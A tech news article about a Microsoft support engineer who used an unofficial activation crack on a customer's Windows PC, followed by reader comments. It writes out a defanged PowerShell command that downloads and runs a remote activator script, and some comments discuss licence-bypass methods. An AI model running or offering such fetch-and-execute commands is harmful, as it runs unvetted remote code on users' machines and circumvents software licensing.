https://www.bleepingcomputer.com/news/security/microsoft-support-cracks-windows-for-customer-after-activation-fails/ BleepingComputer.com logo * * * * [ ] [Login] [Sign up] * * * * [ ] [Login] [Sign up] * News + Featured + Latest + Microsoft fixes Windows Server VMs broken by October updates Microsoft fixes Windows Server VMs broken by October updates + New Samsung data breach impacts UK store customers New Samsung data breach impacts UK store customers + Ransomware gang files SEC complaint over victim's undisclosed breach Ransomware gang files SEC complaint over victim's undisclosed breach + Toronto Public Library confirms data stolen in ransomware attack Toronto Public Library confirms data stolen in ransomware attack + Long Beach, California turns off IT systems after cyberattack Long Beach, California turns off IT systems after cyberattack + FBI shares tactics of notorious Scattered Spider hacker collective FBI shares tactics of notorious Scattered Spider hacker collective + MySQL servers targeted by 'Ddostf' DDoS-as-a-Service botnet MySQL servers targeted by 'Ddostf' DDoS-as-a-Service botnet + Black Friday: Get 5,000+ web-based tech courses for just $99.97 Black Friday: Get 5,000+ web-based tech courses for just $99.97 * Downloads + Latest + Most Downloaded + Qualys BrowserCheck Qualys BrowserCheck + STOPDecrypter STOPDecrypter + AuroraDecrypter AuroraDecrypter + FilesLockerDecrypter FilesLockerDecrypter + AdwCleaner AdwCleaner + ComboFix ComboFix + RKill RKill + Junkware Removal Tool Junkware Removal Tool * VPNs + Popular + Best VPNs Best VPNs + How to change IP address How to change IP address + Access the dark web safely Access the dark web safely + Best VPN for YouTube Best VPN for YouTube * Virus Removal Guides + Latest + Most Viewed + Ransomware + Remove the Theonlinesearch.com Search Redirect Remove the Theonlinesearch.com Search Redirect + Remove the Smartwebfinder.com Search Redirect Remove the Smartwebfinder.com Search Redirect + How to remove the PBlock+ adware browser extension How to remove the PBlock+ adware browser extension + Remove the Toksearches.xyz Search Redirect Remove the Toksearches.xyz Search Redirect + Remove Security Tool and SecurityTool (Uninstall Guide) Remove Security Tool and SecurityTool (Uninstall Guide) + How to Remove WinFixer / Virtumonde / Msevents / Trojan.vundo How to Remove WinFixer / Virtumonde / Msevents / Trojan.vundo + How to remove Antivirus 2009 (Uninstall Instructions) How to remove Antivirus 2009 (Uninstall Instructions) + How to remove Google Redirects or the TDSS, TDL3, or Alureon rootkit using TDSSKiller How to remove Google Redirects or the TDSS, TDL3, or Alureon rootkit using TDSSKiller + Locky Ransomware Information, Help Guide, and FAQ Locky Ransomware Information, Help Guide, and FAQ + CryptoLocker Ransomware Information Guide and FAQ CryptoLocker Ransomware Information Guide and FAQ + CryptorBit and HowDecrypt Information Guide and FAQ CryptorBit and HowDecrypt Information Guide and FAQ + CryptoDefense and How_Decrypt Ransomware Information Guide and FAQ CryptoDefense and How_Decrypt Ransomware Information Guide and FAQ * Tutorials + Latest + Popular + How to enable Kernel-mode Hardware-enforced Stack Protection in Windows 11 How to enable Kernel-mode Hardware-enforced Stack Protection in Windows 11 + How to use the Windows Registry Editor How to use the Windows Registry Editor + How to backup and restore the Windows Registry How to backup and restore the Windows Registry + How to open a Windows 11 Command Prompt as Administrator How to open a Windows 11 Command Prompt as Administrator + How to start Windows in Safe Mode How to start Windows in Safe Mode + How to remove a Trojan, Virus, Worm, or other Malware How to remove a Trojan, Virus, Worm, or other Malware + How to show hidden files in Windows 7 How to show hidden files in Windows 7 + How to see hidden files in Windows How to see hidden files in Windows * Deals + Categories + eLearning eLearning + IT Certification Courses IT Certification Courses + Gear & Gadgets Gear + Gadgets + Security Security * Forums * More + Startup Database + Uninstall Database + Glossary + Chat on Discord + Send us a Tip! + Welcome Guide * Home * News * Security * Microsoft support 'cracks' Windows for customer after activation fails * * Microsoft support 'cracks' Windows for customer after activation fails By Ax Sharma * March 16, 2023 * 08:14 AM * 9 windows In an unexpected twist, a Microsoft support engineer resorted to running an unofficial 'crack' on a customer's Windows PC after a genuine copy of the operating system failed to activate normally. It seems, this isn't the first time either that IT professionals have employed such workarounds when under pressure to timely close out support tickets. A 'crack' is worth a thousand support tickets A South-Africa based freelance technologist who paid $200 for a genuine copy of Windows 10 was startled to see a Microsoft support engineer "crack" his copy using unofficial tools that bypass the Windows activation process. Programmer and content creator Wesley Pyburn whose online channels include TCNO (TroubleChute & TechNobo), explains his struggle after purchasing a copy of Windows 10 through legitimate channels: "I can't believe it. My official Microsoft Store Windows 10 Pro key wouldn't activate. Support couldn't help me yesterday," tweeted the technologist. "Today it was elevated. Official Microsoft support (not a scam) logged in with Quick Assist and ran a command to activate windows... BRO IT'S A CRACK. NO CAP." Microsoft support sessionMicrosoft's support chat session with Pyburn involved engineer running a crack (Twitter) "It's literally easier to crack windows than to pay for it," exclaimed Pyburn. Microsoft Product Activation, as commonly seen in Windows and Office products, is Microsoft's DRM technology to ensure users are running company's genuine products as opposed to pirated versions, and are compliant with the license terms. Windows XP-era users may also be familiar with Windows Genuine Advantage (WGA), a validation process that Microsoft earlier enforced to automatically 'deactivate' pirated OS copies. "Activation helps verify that your copy of Windows is genuine and hasn't been used on more devices than the Microsoft Software License Terms allow," according to Microsoft. Microsoft's official Windows activation methods involve either the customer entering a 25-character product key when prompted, or signing in with their Microsoft account to apply a digital license. In some cases, customers may also call the customer care to "activate by phone." Typical Microsoft Windows 10 activation workflowTypical Microsoft Windows 10 activation dialog prompting for a key (Microsoft Community ) By contrast, software "cracks" and stolen product keys are commonly used by users looking to pirate software--something which is forbidden both by a company's licensing terms and by law in most jurisdictions. The Microsoft support engineer in this case, ran the following PowerShell command on the customer's Windows PC (URL slightly modified to prevent execution): irm hxxps://massgrave[.]dev/get | iex The command establishes a connection to massgrave.dev, an unofficial repository of Windows and Office "activator" scripts that may slip under the radar of most antivirus products. Further, the Invoke-Expression aka iex command runs the downloaded script, as seen by BleepingComputer: Windows 10 activation script by Massgrave.devWindows 10 activation script from Massgrave.dev "Working in IT I can 100% believe this lmao, commented one user. "They're probably as dumbfounded by the issue as you and/or don't have a better solution and it solves the problem/resolves the ticket so they're happy." Cracks, warez, pirated software pose risks Using "warez," cracks, and other unofficial means to bypass software copy protection are often frowned upon. Other than falling in a legal gray area and being akin to pirating software, these methods pose a security risk. For example, third-party scripts claiming to be software 'cracks' may instead be malware. To clarify if what Microsoft support agent had run was indeed a crack, Pyburn reached out to Massgrave's staff via Discord. Not only did the website staff reply affirmatively to the technologist's question, they further claimed, it wasn't the first time they'd heard of a Microsoft engineer doing this. "This is the second time someone reported here that it's being used by Microsoft support agents. It's not official and not legal," writes WindowsAddict, a Massgrave staff member. Massgrave Discord chatMassgrave Discord staff suggests Microsoft support often uses these tools Naturally, such workarounds when employed by a software company's support staff would leave just about anyone startled. "I can not believe Microsoft's answer to a broken activation system is to crack windows via official support channels," says Pyburn. "...AND IT WAS OFFICIAL SUPPORT. The entire reason I paid was to avoid rootkits and other malware COMPLETELY. Then they crack it for me." BleepingComputer approached Microsoft for comment in advance of publishing. "We strive to provide best-in-class support for our customers. The technique you described would be against our policy," a Microsoft spokesperson told BleepingComputer. "We are investigating this occurrence and will take appropriate steps to ensure proper procedures are followed regarding customer support for our products and services." Update March 17th, 1:13 AM ET: Added statement from Microsoft received after press time. Related Articles: Microsoft November 2023 Patch Tuesday fixes 5 zero-days, 58 flaws Microsoft warns of incorrect BitLocker encryption errors Microsoft October 2023 Patch Tuesday fixes 3 zero-days, 104 flaws Microsoft confirms Copilot AI assistant coming to Windows 10 Windows 11 KB5032190 update enables Moment 4 features for everyone * Crack * Cracked * Warez * Windows 10 * Windows 11 * * * * * Ax Sharma Ax Sharma is a Security Researcher and Tech Reporter. His works and expert analyses have frequently been featured by leading media outlets including the BBC, Business Insider, Fortune, TechCrunch, The Register, and others. Ax's expertise lies in vulnerability research, malware analysis, and open source software. He's an active community member of British Association of Journalists (BAJ) and Canadian Association of Journalists (CAJ). Send any tips via email or Twitter DM. * Previous Article * Next Article Comments * GT500 Photo GT500 - 8 months ago + + Good old KMS. The source of so many ransomware infections in the past... And probably miners, but when your PC's performance has tanked and you don't know why most people assume it's time to buy a new PC, or just live with it until it's time to upgrade. * nauip Photo nauip - 8 months ago + + Chances are the MS Tech used the HWID bypass. It's permanent (unlike the KMS that occasionally gets cleaned) because it doesn't require an executable. It also frequently survives a re-install in my experience. * xafase Photo xafase - 8 months ago + + Issue was resolve and ticket was closed. The tech doesn't care. They aren't paid to care. They are paid to close tickets. Bonus point! If ChatGPT told the tech to do that. * lonegull Photo lonegull - 8 months ago + + The short time I endured doing tech support they actively encouraged you to start the customer on any action to get them off the call ASAP. Quite a mess at Microsoft if they can't activate their own product. Had an experience with a new printer where even the manufacturer tech support couldn't make it work. The tech said couldn't find the 'advanced drivers' in Windows (still don't know what they are) and told me to contact Microsoft or the OEM. Kept telling them I built the system (I am the OEM) and it isn't a Microsoft\Windows problem, but they wanted me off the call. Returned the printer for a refund. * EndangeredPootisBird Photo EndangeredPootisBird - 8 months ago + + I would think that out of anyone, people at Microsoft would know that cracks are the most common attack vector of malware. * speedingcheetah Photo speedingcheetah - 7 months ago + + This is just, weird. You do realize though, that any product key off any old computer, even brand name OEM ones, works still to fully and seemingly legitly/legally activate Windows 10 and 11. I have used keys from long dead and recycled Win 7, even Vista machines, both laptops and desktops, to activate Windows 10/11 on many modern builds. Where i used to work, even years back, dig out of the scrap pile old COA stickers still stuck to the bottom of old scraped Dell and HP business laptops, or desktops, and the keys have worked fine to activate and shows as "Activated with digital license" in the Activation page of Settings. It even does something to add the key to your MS account, and if you wipe and re-install the PC, and soon as you log into your MS account, it auto activates the OS for you. Microsoft so desperate for users to move off 7 back in the day, to 8 and newer versions, they let old key still work, claimed later on that will no longer be possible, and you for sure have to start paying to upgrade, but alas, they never disabled the ability to use old Win 7 keys to activate their current OS. * Mr.Tom Photo Mr.Tom - 7 months ago + + You don't need a Mic Acct for it to auto-activate. Once you're "activated with a digital license", you can wipe it and reinstall without an account and it self activates. But what's cool with activation "tied to your Mic Acct", if you build a new computer and even move your old drive to the new motherboard, your windows activates with the new motherboard. * luvr Photo luvr - 7 months ago + + Yet another proof that DRM = "Digital Restriction Malware". * cprbob Photo cprbob - 7 months ago + + this isn't KMS. And its not a 'crack' its at worst a exploit or unpatched vurnerablity. its HWID its permament as as good as the geniune activation process. BECAUSE it is the geniune activation process(well mostly) to understand that read the docs here: https://massgrave.dev/hwid.html also the tech did nothing illegal. did he violate a work policy who knows. microsoft may have a internal memo because these scripts are easy fix when something is broken. and are 100% reliable. forever is it Illegal? No(well maby but you aren't the courts so lets not pretend to be one) the "license" is neither a product key nor HWID token is is the RIGHT To use the Product Granted by the purchese of said software product or hardware with said product installed the state of the activation ticket has NOTHING todo with the legality Post a Comment Community Rules You need to login in order to post a comment [Login] Not a member yet? Register Now You may also like: [INS::INS] Popular Stories * BlackCat ALPHV Ransomware gang files SEC complaint over victim's undisclosed breach * Patch Tuesday Microsoft November 2023 Patch Tuesday fixes 5 zero-days, 58 flaws Latest Downloads * Malwarebytes Anti-Malware Logo Malwarebytes Anti-Malware Version: 4.6.6.294 5M+ Downloads * Windows Repair (All In One) Logo Windows Repair (All In One) Version: 4.14.1 2M+ Downloads * McAfee Consumer Products Removal tool Logo McAfee Consumer Products Removal tool Version: NA 439,107 Downloads * AdwCleaner Logo AdwCleaner Version: 8.4.0.0 56M+ Downloads * Everything Desktop Search Logo Everything Desktop Search Version: 1.4.1.1017 24,364 Downloads Follow us: * * * * * Main Sections * News * VPN Buyer Guides * Downloads * Virus Removal Guides * Tutorials * Startup Database * Uninstall Database * Glossary Community * Forums * Forum Rules * Chat Useful Resources * Welcome Guide * Sitemap Company * About BleepingComputer * Contact Us * Send us a Tip! * Advertising * Write for BleepingComputer * Social & Feeds * Changelog Terms of Use - Privacy Policy - Ethics Statement - Affiliate Disclosure Copyright @ 2003 - 2023 Bleeping Computer^(r) LLC - All Rights Reserved Login Username [ ] Password [ ] [*] Remember Me [ ] Sign in anonymously [Login] Sign in with Twitter button Sign in with Twitter --------------------------------------------------------------------- Not a member yet? Register Now Reporter Help us understand the problem. What is going on with this comment? * ( )Spam * ( )Abusive or Harmful * ( )Inappropriate content * ( )Strong language * ( )Other [ ] * [ ] Read our posting guidelinese to learn what content is prohibited. Submitting... SUBMIT